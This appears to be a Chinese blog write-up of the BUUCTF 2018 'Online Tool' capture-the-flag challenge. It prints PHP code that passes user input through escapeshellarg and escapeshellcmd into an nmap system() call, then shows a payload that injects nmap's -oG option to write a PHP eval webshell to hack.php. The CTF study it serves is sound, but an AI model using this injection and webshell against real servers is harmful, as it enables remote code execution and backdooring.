[BUUCTF 2018]Online Tool_writeup

进入网站就是代码,开始审计

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

https://blog.csdn.net/qq_26406447/article/details/100711933

传递一个 host参数,经过两个函数 escapeshellargescapeshellcmd的处理

PHP escapeshellarg()+escapeshellcmd() 之殇 (seebug.org),这个文章里介绍两个函数一起用会引发问题

  1. 传入的参数是:172.17.0.2' -v -d a=1经过escapeshellarg处理后变成了'172.17.0.2''' -v -d a=1',即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。
  2. 经过escapeshellcmd处理后变成'172.17.0.2'\'' -v -d a=1',这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义:反斜线(\)会在以下字符之前插入: &#;|*?~<>^()[]{}$`, \x0A\xFF'" 仅在不配对儿的时候被转义。 在 Windows 平台上,所有这些字符以及 %! 字符都会被空格代替。
  3. 最后执行的命令是curl '172.17.0.2'\'' -v -d a=1',由于中间的\被解释为\而不再是转义字符,所以后面的'没有被转义,与再后面的'配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d a=1',即向172.17.0.2\发起请求,POST 数据为a=1'。

nmap工具中有一个参数是可以创建文件的 -oG,可以实现将命令和结果写到文件,payload

?host=' <?php @eval($_POST["hack"]);?> -oG hack.php '
?host=\' <?php @eval($_POST["hack"]);?> -oG hack.php \' //escapeshellarg()执行
?host=''\\'' \<\?php \@eval\(\$_POST\["hack"\]\);\?\> -oG hack.php ''\\''

成功把hack.php文件传到服务器,用蚁剑连接一句话木马文件即可。
image
image

posted @ 2022-01-10 17:48  oldliutou  阅读(60)  评论(0编辑  收藏  举报